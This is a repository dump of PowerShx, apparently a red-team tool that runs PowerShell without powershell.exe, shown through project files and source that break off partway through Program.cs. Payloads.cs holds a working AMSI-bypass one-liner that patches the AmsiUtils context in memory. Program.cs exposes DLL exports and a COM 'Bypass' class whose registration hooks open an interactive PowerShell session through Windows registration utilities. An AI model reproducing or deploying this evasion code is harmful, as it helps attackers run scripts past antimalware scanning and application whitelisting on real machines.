├── .gitignore
├── Common
├── Common.csproj
├── Helpers.cs
├── PSConsole.cs
├── Payloads.cs
├── Properties
│ └── AssemblyInfo.cs
├── Ps.cs
└── packages.config
├── Dll
├── FodyWeavers.xml
├── Options.cs
├── PowerShxDll.csproj
├── ProcessExtensions.cs
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── PsSession.cs
├── SharedGlobals.cs
└── packages.config
├── Exe
├── FodyWeavers.xml
├── Options.cs
├── PowerShxExe.csproj
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── PsSession.cs
├── SharedGlobals.cs
├── app.config
└── packages.config
├── LICENSE
├── PowerShx.sln
├── README.md
└── packages
├── Costura.Fody.4.1.0
├── .signature.p7s
├── build
│ └── Costura.Fody.props
├── lib
│ └── net40
│ │ ├── Costura.dll
│ │ └── Costura.xml
└── weaver
│ ├── Costura.Fody.dll
│ └── Costura.Fody.xcf
└── Fody.6.1.1
├── .signature.p7s
├── License.txt
├── build
└── Fody.targets
├── netclassictask
├── Fody.dll
├── FodyCommon.dll
├── FodyHelpers.dll
├── FodyIsolated.dll
├── Mono.Cecil.Pdb.dll
├── Mono.Cecil.Rocks.dll
└── Mono.Cecil.dll
└── netstandardtask
├── Fody.dll
├── FodyCommon.dll
├── FodyHelpers.dll
├── FodyIsolated.dll
├── Mono.Cecil.Pdb.dll
├── Mono.Cecil.Rocks.dll
└── Mono.Cecil.dll
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Ll]og/
33 | [Ll]ogs/
34 |
35 | # Visual Studio 2015/2017 cache/options directory
36 | .vs/
37 | # Uncomment if you have tasks that create the project's static files in wwwroot
38 | #wwwroot/
39 |
40 | # Visual Studio 2017 auto generated files
41 | Generated\ Files/
42 |
43 | # MSTest test Results
44 | [Tt]est[Rr]esult*/
45 | [Bb]uild[Ll]og.*
46 |
47 | # NUnit
48 | *.VisualState.xml
49 | TestResult.xml
50 | nunit-*.xml
51 |
52 | # Build Results of an ATL Project
53 | [Dd]ebugPS/
54 | [Rr]eleasePS/
55 | dlldata.c
56 |
57 | # Benchmark Results
58 | BenchmarkDotNet.Artifacts/
59 |
60 | # .NET Core
61 | project.lock.json
62 | project.fragment.lock.json
63 | artifacts/
64 |
65 | # ASP.NET Scaffolding
66 | ScaffoldingReadMe.txt
67 |
68 | # StyleCop
69 | StyleCopReport.xml
70 |
71 | # Files built by Visual Studio
72 | *_i.c
73 | *_p.c
74 | *_h.h
75 | *.ilk
76 | *.meta
77 | *.obj
78 | *.iobj
79 | *.pch
80 | *.pdb
81 | *.ipdb
82 | *.pgc
83 | *.pgd
84 | *.rsp
85 | *.sbr
86 | *.tlb
87 | *.tli
88 | *.tlh
89 | *.tmp
90 | *.tmp_proj
91 | *_wpftmp.csproj
92 | *.log
93 | *.tlog
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 |
200 | # except build/, which is used as an MSBuild target.
201 | !**/[Pp]ackages/build/
202 | # Uncomment if necessary however generally it will be regenerated when needed
203 | #!**/[Pp]ackages/repositories.config
204 | # NuGet v3's project.json files produces more ignorable files
205 | *.nuget.props
206 | *.nuget.targets
207 |
208 | # Nuget personal access tokens and Credentials
209 | nuget.config
210 |
211 | # Microsoft Azure Build Output
212 | csx/
213 | *.build.csdef
214 |
215 | # Microsoft Azure Emulator
216 | ecf/
217 | rcf/
218 |
219 | # Windows Store app package directories and files
220 | AppPackages/
221 | BundleArtifacts/
222 | Package.StoreAssociation.xml
223 | _pkginfo.txt
224 | *.appx
225 | *.appxbundle
226 | *.appxupload
227 |
228 | # Visual Studio cache files
229 | # files ending in .cache can be ignored
230 | *.[Cc]ache
231 | # but keep track of directories ending in .cache
232 | !?*.[Cc]ache/
233 |
234 | # Others
235 | ClientBin/
236 | ~$*
237 | *~
238 | *.dbmdl
239 | *.dbproj.schemaview
240 | *.jfm
241 | *.pfx
242 | *.publishsettings
243 | orleans.codegen.cs
244 |
245 | # Including strong name files can present a security risk
246 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
247 | *.snk
248 |
249 | # Since there are multiple workflows, uncomment next line to ignore bower_components
250 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
251 | #bower_components/
252 |
253 | # RIA/Silverlight projects
254 | Generated_Code/
255 |
256 | # Backup & report files from converting an old project file
257 | # to a newer Visual Studio version. Backup files are not needed,
258 | # because we have git ;-)
259 | _UpgradeReport_Files/
260 | Backup*/
261 | UpgradeLog*.XML
262 | UpgradeLog*.htm
263 | ServiceFabricBackup/
264 | *.rptproj.bak
265 |
266 | # SQL Server files
267 | *.mdf
268 | *.ldf
269 | *.ndf
270 |
271 | # Business Intelligence projects
272 | *.rdl.data
273 | *.bim.layout
274 | *.bim_*.settings
275 | *.rptproj.rsuser
276 | *- [Bb]ackup.rdl
277 | *- [Bb]ackup ([0-9]).rdl
278 | *- [Bb]ackup ([0-9][0-9]).rdl
279 |
280 | # Microsoft Fakes
281 | FakesAssemblies/
282 |
283 | # GhostDoc plugin setting file
284 | *.GhostDoc.xml
285 |
286 | # Node.js Tools for Visual Studio
287 | .ntvs_analysis.dat
288 | node_modules/
289 |
290 | # Visual Studio 6 build log
291 | *.plg
292 |
293 | # Visual Studio 6 workspace options file
294 | *.opt
295 |
296 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
297 | *.vbw
298 |
299 | # Visual Studio LightSwitch build output
300 | **/*.HTMLClient/GeneratedArtifacts
301 | **/*.DesktopClient/GeneratedArtifacts
302 | **/*.DesktopClient/ModelManifest.xml
303 | **/*.Server/GeneratedArtifacts
304 | **/*.Server/ModelManifest.xml
305 | _Pvt_Extensions
306 |
307 | # Paket dependency manager
308 | .paket/paket.exe
309 | paket-files/
310 |
311 | # FAKE - F# Make
312 | .fake/
313 |
314 | # CodeRush personal settings
315 | .cr/personal
316 |
317 | # Python Tools for Visual Studio (PTVS)
318 | __pycache__/
319 | *.pyc
320 |
321 | # Cake - Uncomment if you are using it
322 | # tools/**
323 | # !tools/packages.config
324 |
325 | # Tabs Studio
326 | *.tss
327 |
328 | # Telerik's JustMock configuration file
329 | *.jmconfig
330 |
331 | # BizTalk build output
332 | *.btp.cs
333 | *.btm.cs
334 | *.odx.cs
335 | *.xsd.cs
336 |
337 | # OpenCover UI analysis results
338 | OpenCover/
339 |
340 | # Azure Stream Analytics local run output
341 | ASALocalRun/
342 |
343 | # MSBuild Binary and Structured Log
344 | *.binlog
345 |
346 | # NVidia Nsight GPU debugger configuration file
347 | *.nvuser
348 |
349 | # MFractors (Xamarin productivity tool) working folder
350 | .mfractor/
351 |
352 | # Local History for Visual Studio
353 | .localhistory/
354 |
355 | # BeatPulse healthcheck temp database
356 | healthchecksdb
357 |
358 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
359 | MigrationBackup/
360 |
361 | # Ionide (cross platform F# VS Code tools) working folder
362 | .ionide/
363 |
364 | # Fody - auto-generated XML schema
365 | FodyWeavers.xsd
366 |
367 | # VS Code files for those working on multiple tools
368 | .vscode/*
369 | !.vscode/settings.json
370 | !.vscode/tasks.json
371 | !.vscode/launch.json
372 | !.vscode/extensions.json
373 | *.code-workspace
374 |
375 | # Local History for Visual Studio Code
376 | .history/
377 |
378 | # Windows Installer files from build outputs
379 | *.cab
380 | *.msi
381 | *.msix
382 | *.msm
383 | *.msp
384 |
385 | # JetBrains Rider
386 | .idea/
387 | *.sln.iml
--------------------------------------------------------------------------------
/Common/Common.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {5C578418-CF03-400A-882B-73BE43D8E957}
8 | Library
9 | Properties
10 | Common
11 | Common
12 | v4.0
13 | 512
14 | true
15 |
16 |
17 |
18 |
19 |
20 | true
21 | full
22 | false
23 | bin\Debug\
24 | DEBUG;TRACE
25 | prompt
26 | 4
27 | false
28 | AnyCPU
29 |
30 |
31 | pdbonly
32 | false
33 | bin\Release\
34 | TRACE
35 | prompt
36 | 4
37 | false
38 | x64
39 |
40 |
41 | false
42 |
43 |
44 | true
45 | bin\x86\Debug\
46 | DEBUG;TRACE
47 | false
48 | full
49 | AnyCPU
50 | 7.3
51 | prompt
52 | false
53 |
54 |
55 | bin\x86\Release\
56 | TRACE
57 | true
58 | pdbonly
59 | x86
60 | 7.3
61 | prompt
62 | false
63 |
64 |
65 | true
66 | bin\x64\Debug\
67 | DEBUG;TRACE
68 | false
69 | full
70 | x64
71 | 7.3
72 | prompt
73 | false
74 |
75 |
76 | bin\x64\Release\
77 | TRACE
78 | true
79 | pdbonly
80 | x64
81 | 7.3
82 | prompt
83 | false
84 |
85 |
86 |
87 |
88 |
89 | ..\packages\Microsoft.PowerShell.5.ReferenceAssemblies.1.1.0\lib\net4\System.Management.Automation.dll
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
--------------------------------------------------------------------------------
/Common/Helpers.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.ComponentModel;
3 | using System.Runtime.InteropServices;
4 | using System.Text;
5 |
6 | namespace Common
7 | {
8 | public static class Helpers
9 | {
10 | [DllImport("shell32.dll", SetLastError = true)]
11 | private static extern IntPtr CommandLineToArgvW([MarshalAs(UnmanagedType.LPWStr)] string lpCmdLine, out int pNumArgs);
12 |
13 | [DllImport("kernel32.dll")]
14 | private static extern IntPtr LocalFree(IntPtr hMem);
15 |
16 |
17 |
18 | ///
19 | /// Credits: https://stackoverflow.com/a/49214724
20 | ///
21 | ///
22 | ///
23 | public static string[] ParseCommandLineArgs(string input)
24 | {
25 | var ptrToSplitArgs = CommandLineToArgvW(input, out var numberOfArgs);
26 |
27 | // CommandLineToArgvW returns NULL upon failure.
28 | if (ptrToSplitArgs == IntPtr.Zero)
29 | throw new ArgumentException("Unable to split argument.", new Win32Exception());
30 |
31 |
32 | // Make sure the memory ptrToSplitArgs to is freed, even upon failure.
33 | try
34 | {
35 | var splitArgs = new string[numberOfArgs];
36 |
37 | // ptrToSplitArgs is an array of pointers to null terminated Unicode strings.
38 | // Copy each of these strings into our split argument array.
39 | for (var i = 0; i < numberOfArgs; i++)
40 | {
41 | splitArgs[i] = Marshal.PtrToStringUni(
42 | Marshal.ReadIntPtr(ptrToSplitArgs, i * IntPtr.Size));
43 | }
44 |
45 | return splitArgs;
46 | }
47 | finally
48 | {
49 | // Free memory obtained by CommandLineToArgW.
50 | LocalFree(ptrToSplitArgs);
51 | }
52 | }
53 |
54 | public static string DecodeB64(string s, Encoding encoding)
55 | {
56 | try
57 | {
58 | var textAsBytes = Convert.FromBase64String(s);
59 | var decodedText = encoding.GetString(textAsBytes);
60 | return decodedText;
61 | }
62 | catch (Exception)
63 | {
64 | return string.Empty;
65 | }
66 | }
67 | }
68 |
69 | }
70 |
--------------------------------------------------------------------------------
/Common/PSConsole.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO;
4 | using System.Runtime.InteropServices;
5 | using System.Text;
6 | using Microsoft.Win32.SafeHandles;
7 |
8 | namespace Common
9 | {
10 | public class PSConsole
11 | {
12 | [DllImport("kernel32.dll",
13 | EntryPoint = "GetStdHandle",
14 | SetLastError = true,
15 | CharSet = CharSet.Auto,
16 | CallingConvention = CallingConvention.StdCall)]
17 |
18 | private static extern IntPtr GetStdHandle(int nStdHandle);
19 | [DllImport("kernel32.dll",
20 | EntryPoint = "AllocConsole",
21 | SetLastError = true,
22 | CharSet = CharSet.Auto,
23 | CallingConvention = CallingConvention.StdCall)]
24 |
25 | private static extern int AllocConsole();
26 | private const int STD_OUTPUT_HANDLE = -11;
27 | private const int MY_CODE_PAGE = 437;
28 |
29 | [DllImport("kernel32", SetLastError = true)]
30 | static extern bool AttachConsole(uint dwProcessId);
31 | [DllImport("user32.dll")]
32 | static extern IntPtr GetForegroundWindow();
33 |
34 | [DllImport("user32.dll")]
35 | [return: MarshalAs(UnmanagedType.Bool)]
36 | static extern bool SetForegroundWindow(IntPtr hWnd);
37 |
38 | [DllImport("user32.dll", SetLastError = true)]
39 | static extern uint GetWindowThreadProcessId(IntPtr hWnd, out int lpdwProcessId);
40 |
41 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
42 | static extern bool FreeConsole();
43 |
44 | private const int STD_ERROR_HANDLE = -12;
45 | //private static bool _consoleAttached = false;
46 | //private static IntPtr consoleWindow;
47 |
48 |
49 | public void GetNewConsole()
50 | {
51 | try
52 | {
53 | AllocConsole();
54 | var stdHandle = GetStdHandle(STD_OUTPUT_HANDLE);
55 | var safeFileHandle = new SafeFileHandle(stdHandle, true);
56 | var fileStream = new FileStream(safeFileHandle, FileAccess.Write);
57 | var encoding = Encoding.GetEncoding(MY_CODE_PAGE);
58 | var standardOutput = new StreamWriter(fileStream, encoding);
59 | standardOutput.AutoFlush = true;
60 | Console.SetOut(standardOutput);
61 | }
62 | catch
63 | {
64 | //
65 | }
66 | }
67 | public void StealConsole(Process pp)
68 | {
69 | try
70 | {
71 | var ppid = pp.Id;
72 | if (!AttachConsole((uint) ppid))
73 | return;
74 |
75 | //_consoleAttached = true;
76 | var stdHandle = GetStdHandle(STD_ERROR_HANDLE);
77 | var safeFileHandle = new SafeFileHandle(stdHandle, true);
78 | var fileStream = new FileStream(safeFileHandle, FileAccess.Write);
79 | var encoding = Encoding.ASCII;
80 | var standardOutput = new StreamWriter(fileStream, encoding);
81 | standardOutput.AutoFlush = true;
82 | Console.SetOut(standardOutput);
83 | }
84 | catch
85 | {
86 | //
87 | }
88 | }
89 | }
90 | }
91 |
--------------------------------------------------------------------------------
/Common/Payloads.cs:
--------------------------------------------------------------------------------
1 | using System.Collections.Generic;
2 |
3 | namespace Common
4 | {
5 | // More on http://amsi.fail
6 | public static class Payloads
7 | {
8 |
9 | public static Dictionary PayloadDict = new Dictionary
10 | {
11 | {
12 | "amsi",
13 | "$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like \"*iUtils\") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like \"*Context\") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)"
14 |
15 | }
16 | };
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/Common/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Common")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Common")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("804c93af-af1e-467e-b5ef-fe828e59a302")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Common/Ps.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Management.Automation.Runspaces;
3 | using System.Text;
4 |
5 | namespace Common
6 | {
7 | public class PS
8 | {
9 | readonly Runspace _runspace;
10 |
11 | public PS()
12 | {
13 | _runspace = RunspaceFactory.CreateRunspace();
14 | _runspace.Open();
15 | }
16 |
17 | public string Exe(string cmd)
18 | {
19 | try
20 | {
21 | var pipeline = _runspace.CreatePipeline();
22 | pipeline.Commands.AddScript(cmd);
23 | pipeline.Commands.Add("Out-String");
24 | var results = pipeline.Invoke();
25 | var stringBuilder = new StringBuilder();
26 | foreach (var obj in results)
27 | {
28 | foreach (var line in obj.ToString().Split(new[] { "\r\n", "\r", "\n" }, StringSplitOptions.None))
29 | {
30 | stringBuilder.AppendLine(line.TrimEnd());
31 | }
32 | }
33 | return stringBuilder.ToString();
34 | }
35 | catch (Exception e)
36 | {
37 | var errorText = e.Message + "\n";
38 | return (errorText);
39 | }
40 | }
41 |
42 |
43 | public void Close()
44 | {
45 | try
46 | {
47 | _runspace.Close();
48 | }
49 | catch (Exception)
50 | {
51 | //
52 | }
53 | }
54 | }
55 | }
56 |
--------------------------------------------------------------------------------
/Common/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Dll/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/Dll/Options.cs:
--------------------------------------------------------------------------------
1 | using CommandLine;
2 |
3 | namespace W
4 | {
5 | public class Options
6 | {
7 | [Option('e', Required = false, HelpText = "")]
8 | public string Script { get; set; }
9 |
10 |
11 | [Option('f', Required = false, HelpText = "Run the script passed as argument. -f ")]
12 | public string ScriptPath { get; set; }
13 |
14 | [Option('c', Required = false, HelpText = "Load a script and run a PS cmdlet. -f -c ")]
15 | public string Cmdlet { get; set; }
16 |
17 |
18 | [Option('i', Required = false, HelpText = "Start an interactive console")]
19 | public bool Interactive { get; set; }
20 |
21 |
22 | [Option('s', Required = false, HelpText = "Attempt to bypass AMSI.")]
23 | public bool BypassAmsi { get; set; }
24 |
25 |
26 | [Option('w', Required = false, HelpText = "Start an interactive console in a new window")]
27 | public bool ConsoleNewWindow { get; set; }
28 |
29 |
30 | [Option('v', Required = false, HelpText = "Print Execution Output to the console")]
31 | public bool ShowConsole { get; set; }
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/Dll/PowerShxDll.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Debug
7 | AnyCPU
8 | {1E70D62D-CC36-480F-82BB-E9593A759AF9}
9 | Library
10 | W
11 | PowerShx
12 | v4.0
13 | 512
14 | true
15 |
16 |
17 |
18 |
19 |
20 | AnyCPU
21 | true
22 | full
23 | false
24 | bin\Debug\
25 | DEBUG;TRACE
26 | prompt
27 | 4
28 | false
29 |
30 |
31 | x64
32 | pdbonly
33 | false
34 | bin\Release\
35 | TRACE
36 | prompt
37 | 4
38 | false
39 |
40 |
41 |
42 |
43 |
44 | false
45 |
46 |
47 | true
48 | bin\x86\Debug\
49 | DEBUG;TRACE
50 | false
51 | full
52 | AnyCPU
53 | 7.3
54 | prompt
55 | false
56 |
57 |
58 | bin\x86\Release\
59 | TRACE
60 | true
61 | pdbonly
62 | x86
63 | 7.3
64 | prompt
65 | false
66 |
67 |
68 | true
69 | bin\x64\Debug\
70 | DEBUG;TRACE
71 | false
72 | full
73 | x64
74 | 7.3
75 | prompt
76 | false
77 |
78 |
79 | bin\x64\Release\
80 | TRACE
81 | true
82 | pdbonly
83 | x64
84 | 7.3
85 | prompt
86 | false
87 |
88 |
89 | false
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 | ..\packages\CommandLineParser.2.8.0\lib\net40\CommandLine.dll
98 |
99 |
100 | ..\packages\Costura.Fody.4.1.0\lib\net40\Costura.dll
101 |
102 |
103 | ..\packages\UnmanagedExports.1.2.7\lib\net\RGiesecke.DllExport.Metadata.dll
104 | False
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 | {5c578418-cf03-400a-882b-73be43d8e957}
126 | Common
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.
138 |
139 |
140 |
141 |
142 |
--------------------------------------------------------------------------------
/Dll/ProcessExtensions.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Runtime.InteropServices;
4 |
5 | namespace W
6 | {
7 | public static class ProcessExtensions
8 | {
9 | [Flags]
10 | public enum ThreadAccess : int
11 | {
12 | TERMINATE = (0x0001),
13 | SUSPEND_RESUME = (0x0002),
14 | GET_CONTEXT = (0x0008),
15 | SET_CONTEXT = (0x0010),
16 | SET_INFORMATION = (0x0020),
17 | QUERY_INFORMATION = (0x0040),
18 | SET_THREAD_TOKEN = (0x0080),
19 | IMPERSONATE = (0x0100),
20 | DIRECT_IMPERSONATION = (0x0200)
21 | }
22 |
23 | [DllImport("kernel32.dll")]
24 | static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, uint dwThreadId);
25 | [DllImport("kernel32.dll")]
26 | static extern uint SuspendThread(IntPtr hThread);
27 | [DllImport("kernel32.dll")]
28 | static extern int ResumeThread(IntPtr hThread);
29 |
30 | public static void Suspend(this Process process)
31 | {
32 | foreach (ProcessThread thread in process.Threads)
33 | {
34 | var pOpenThread = OpenThread(ThreadAccess.SUSPEND_RESUME, false, (uint)thread.Id);
35 | if (pOpenThread == IntPtr.Zero)
36 | {
37 | break;
38 | }
39 | SuspendThread(pOpenThread);
40 | }
41 | }
42 | public static void Resume(this Process process)
43 | {
44 | try
45 | {
46 |
47 | foreach (ProcessThread thread in process.Threads)
48 | {
49 | var pOpenThread = OpenThread(ThreadAccess.SUSPEND_RESUME, false, (uint)thread.Id);
50 | if (pOpenThread == IntPtr.Zero)
51 | {
52 | break;
53 | }
54 | ResumeThread(pOpenThread);
55 | }
56 | }
57 | catch
58 | {
59 | //
60 | }
61 | }
62 | private static string FindIndexedProcessName(int pid)
63 | {
64 | var processName = Process.GetProcessById(pid).ProcessName;
65 | var processesByName = Process.GetProcessesByName(processName);
66 | string processIndexdName = null;
67 |
68 | for (var index = 0; index < processesByName.Length; index++)
69 | {
70 | processIndexdName = index == 0 ? processName : processName + "#" + index;
71 | var processId = new PerformanceCounter("Process", "ID Process", processIndexdName);
72 | if ((int)processId.NextValue() == pid)
73 | {
74 | return processIndexdName;
75 | }
76 | }
77 |
78 | return processIndexdName;
79 | }
80 |
81 | private static Process FindPidFromIndexedProcessName(string indexedProcessName)
82 | {
83 | var parentId = new PerformanceCounter("Process", "Creating Process ID", indexedProcessName);
84 | return Process.GetProcessById((int)parentId.NextValue());
85 | }
86 |
87 | public static Process Parent(this Process process)
88 | {
89 | return FindPidFromIndexedProcessName(FindIndexedProcessName(process.Id));
90 | }
91 | }
92 | }
93 |
--------------------------------------------------------------------------------
/Dll/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Diagnostics;
4 | using System.Runtime.InteropServices;
5 | using RGiesecke.DllExport;
6 | using System.EnterpriseServices;
7 | using CommandLine;
8 | using CommandLine.Text;
9 | using Common;
10 |
11 | [assembly: ApplicationActivation(ActivationOption.Server)]
12 | [assembly: ApplicationAccessControl(false)]
13 |
14 | namespace W
15 | {
16 |
17 | public static class Program
18 | {
19 | private static Process _pp = new Process();
20 | private static readonly PSConsole PSConsole = new PSConsole();
21 |
22 | [DllExport("main", CallingConvention = CallingConvention.Cdecl)]
23 | public static void main(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
24 | {
25 | if (string.IsNullOrEmpty(lpszCmdLine))
26 | {
27 | Print("");
28 | PrintAbout();
29 | Print(SharedGlobals.UsageExamples());
30 | return;
31 | }
32 |
33 | var ps = new PsSession();
34 | var args = Helpers.ParseCommandLineArgs(lpszCmdLine);
35 | var options = ParseUserArgs(args);
36 | ps.Start(options);
37 | }
38 |
39 | [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
40 | public static void DllRegisterServer()
41 | {
42 | var ps = new PsSession();
43 | ps.Start(new Options { Interactive = true });
44 | }
45 |
46 | [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
47 | public static void DllUnregisterServer()
48 | {
49 | var ps = new PsSession();
50 | ps.Start(new Options{Interactive = true});
51 | }
52 |
53 | [ComVisible(true)]
54 | [Guid("31D2B969-7608-426E-9D8E-A09FC9A51680")]
55 | [ClassInterface(ClassInterfaceType.None)]
56 | [ProgId("dllguest.Bypass")]
57 | [Transaction(TransactionOption.Required)]
58 | public class Bypass : ServicedComponent
59 | {
60 | [ComRegisterFunction] //This executes if registration is successful
61 | public static void RegisterClass(string key)
62 | {
63 | var ps = new PsSession();
64 | ps.Start(new Options { Interactive = true });
65 | }
66 |
67 | [ComUnregisterFunction] //This executes if registration fails
68 | public static void UnRegisterClass(string key)
69 | {
70 | var ps = new PsSession();
71 | ps.Start(new Options { Interactive = true });
72 | }
73 |
74 | public void Exec()
75 | {
76 | var ps = new PsSession();
77 | ps.Start(new Options { Interactive = true });
78 | }
79 | }
80 |
81 | #region User Args parser
82 |
83 |
84 | private static Options ParseUserArgs(string[] args)
85 | {
86 | // Parse arguments passed
87 | var parser = new Parser(with =>
88 | {
89 | with.CaseInsensitiveEnumValues = true;
90 | with.CaseSensitive = false;
91 | with.HelpWriter = null;
92 | });
93 |
94 |
95 | Options options = null;
96 |
97 |
98 | var parserResult = parser.ParseArguments(args);
99 | parserResult.WithParsed(o => { options = o; }).WithNotParsed(errs => DisplayHelp(parserResult, errs));
100 |
101 | return options;
102 | }
103 |
104 | private static void DisplayHelp(ParserResult result, IEnumerable errs)
105 | {
106 | var helpText = HelpText.AutoBuild(result, h =>
107 | {
108 | h.AdditionalNewLineAfterOption = false;
109 | h.AutoVersion = false;
110 | return HelpText.DefaultParsingErrorsHandler(result, h);
111 | }, e => e);
112 |
113 | Print(helpText);
114 | }
115 |
116 |
117 | #endregion
118 |
119 |
120 | private static void Cleanup()
121 | {
122 | try
123 | {
124 | _pp.Resume();
125 | }
126 | catch
127 | {
128 | //
129 | }
130 | }
131 |
132 |
133 | private static void Print(string msg)
134 | {
135 | _pp = Process.GetCurrentProcess().Parent();
136 | PSConsole.StealConsole(_pp);
137 | Console.CancelKeyPress += delegate
138 | {
139 | Cleanup();
140 | };
141 | Console.SetCursorPosition(0, Console.CursorTop + 1);
142 |
143 | Console.WriteLine(msg);
144 | }
145 |
146 |
